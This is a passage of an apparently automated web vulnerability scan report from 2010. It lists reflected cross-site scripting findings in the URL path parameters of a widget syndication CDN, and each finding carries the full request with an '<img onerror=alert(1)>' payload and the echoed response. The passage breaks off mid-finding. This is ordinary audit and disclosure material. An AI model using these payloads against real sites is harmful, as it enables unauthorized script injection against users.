2.57. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 220e1<img%20src%3da%20onerror%3dalert(1)>11fe418b31b was submitted in the REST URL parameter 4. This input was echoed as 220e1<img src=a onerror=alert(1)>11fe418b31b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id220e1<img%20src%3da%20onerror%3dalert(1)>11fe418b31b/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:48 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17789


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
adyCallback, true);
}
};

WIDGETBOX.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"platform":"InsertWidget","id220e1<img src=a onerror=alert(1)>11fe418b31b":"53234a87-ed5a-47ec-859e-f6aaec12e3ce"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http://ad.double
...[SNIP]...

2.58. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fd72b<img%20src%3da%20onerror%3dalert(1)>26ee0bd96c1 was submitted in the REST URL parameter 5. This input was echoed as fd72b<img src=a onerror=alert(1)>26ee0bd96c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3cefd72b<img%20src%3da%20onerror%3dalert(1)>26ee0bd96c1/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:51 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17789


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
true);
}
};

WIDGETBOX.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"id":"53234a87-ed5a-47ec-859e-f6aaec12e3cefd72b<img src=a onerror=alert(1)>26ee0bd96c1","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http://ad.doubleclick.net/clk
...[SNIP]...

2.59. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload ca147<img%20src%3da%20onerror%3dalert(1)>5a5384338c5 was submitted in the REST URL parameter 6. This input was echoed as ca147<img src=a onerror=alert(1)>5a5384338c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:ca147<img%20src%3da%20onerror%3dalert(1)>5a5384338c5//img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:54 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17789


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"id":"53234a87-ed5a-47ec-859e-f6aaec12e3ce","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:ca147<img src=a onerror=alert(1)>5a5384338c5//img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http://ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.p
...[SNIP]...

2.60. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 6650a<img%20src%3da%20onerror%3dalert(1)>ecade577ac8 was submitted in the REST URL parameter 7. This input was echoed as 6650a<img src=a onerror=alert(1)>ecade577ac8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com6650a<img%20src%3da%20onerror%3dalert(1)>ecade577ac8/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:57 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17789


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
form.WidgetConfigPathHandler = {
initializationParams : {"id":"53234a87-ed5a-47ec-859e-f6aaec12e3ce","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com6650a<img src=a onerror=alert(1)>ecade577ac8/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http://ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfi
...[SNIP]...

2.61. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 8bc7b<img%20src%3da%20onerror%3dalert(1)>4e400dae6d3 was submitted in the REST URL parameter 8. This input was echoed as 8bc7b<img src=a onerror=alert(1)>4e400dae6d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded8bc7b<img%20src%3da%20onerror%3dalert(1)>4e400dae6d3/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:00 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17789


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
etConfigPathHandler = {
initializationParams : {"id":"53234a87-ed5a-47ec-859e-f6aaec12e3ce","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploaded8bc7b<img src=a onerror=alert(1)>4e400dae6d3/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http://ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHand
...[SNIP]...

2.62. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 84524<img%20src%3da%20onerror%3dalert(1)>d41c2a32747 was submitted in the REST URL parameter 9. This input was echoed as 84524<img src=a onerror=alert(1)>d41c2a32747 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b9684524<img%20src%3da%20onerror%3dalert(1)>d41c2a32747/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:02 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17789


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
alizationParams : {"id":"53234a87-ed5a-47ec-859e-f6aaec12e3ce","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b9684524<img src=a onerror=alert(1)>d41c2a32747/ibmbackupm.png","wbx_ns_link":"http://ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];

...[SNIP]...

2.63. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 10]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 10 is copied into the HTML document as plain text between tags. The payload 3cf92<img%20src%3da%20onerror%3dalert(1)>c32d66ccddf was submitted in the REST URL parameter 10. This input was echoed as 3cf92<img src=a onerror=alert(1)>c32d66ccddf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:3cf92<img%20src%3da%20onerror%3dalert(1)>c32d66ccddf/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:02 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17779


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
5a-47ec-859e-f6aaec12e3ce","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http:3cf92<img src=a onerror=alert(1)>c32d66ccddf/ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platfo
...[SNIP]...

2.64. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 11]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 11 is copied into the HTML document as plain text between tags. The payload db50d<img%20src%3da%20onerror%3dalert(1)>7a79867db58 was submitted in the REST URL parameter 11. This input was echoed as db50d<img src=a onerror=alert(1)>7a79867db58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.netdb50d<img%20src%3da%20onerror%3dalert(1)>7a79867db58/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:06 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Content-Length: 17779
Connection: close


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
12e3ce","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http:/ad.doubleclick.netdb50d<img src=a onerror=alert(1)>7a79867db58/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platform.FriendlyIFrame){
...[SNIP]...

2.65. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 12]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 12 is copied into the HTML document as plain text between tags. The payload 7fa15<img%20src%3da%20onerror%3dalert(1)>ad69b791dbc was submitted in the REST URL parameter 12. This input was echoed as 7fa15<img src=a onerror=alert(1)>ad69b791dbc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk7fa15<img%20src%3da%20onerror%3dalert(1)>ad69b791dbc HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:09 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17787


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
ce","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http:/ad.doubleclick.net/clk7fa15<img src=a onerror=alert(1)>ad69b791dbc"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platform.FriendlyIFrame){

...[SNIP]...

2.66. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d8e22<img%20src%3da%20onerror%3dalert(1)>438d8369141 was submitted in the REST URL parameter 4. This input was echoed as d8e22<img src=a onerror=alert(1)>438d8369141 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/idd8e22<img%20src%3da%20onerror%3dalert(1)>438d8369141/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:45 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17779


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
adyCallback, true);
}
};

WIDGETBOX.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"platform":"InsertWidget","idd8e22<img src=a onerror=alert(1)>438d8369141":"53234a87-ed5a-47ec-859e-f6aaec12e3ce"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http:/ad.doublecl
...[SNIP]...

2.67. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8653d<img%20src%3da%20onerror%3dalert(1)>f2b799089e1 was submitted in the REST URL parameter 5. This input was echoed as 8653d<img src=a onerror=alert(1)>f2b799089e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce8653d<img%20src%3da%20onerror%3dalert(1)>f2b799089e1/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:48 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17787


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
true);
}
};

WIDGETBOX.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"id":"53234a87-ed5a-47ec-859e-f6aaec12e3ce8653d<img src=a onerror=alert(1)>f2b799089e1","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http:/ad.doubleclick.net/clk"}
...[SNIP]...

2.68. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e1858<img%20src%3da%20onerror%3dalert(1)>142cee02189 was submitted in the REST URL parameter 6. This input was echoed as e1858<img src=a onerror=alert(1)>142cee02189 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:e1858<img%20src%3da%20onerror%3dalert(1)>142cee02189/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1
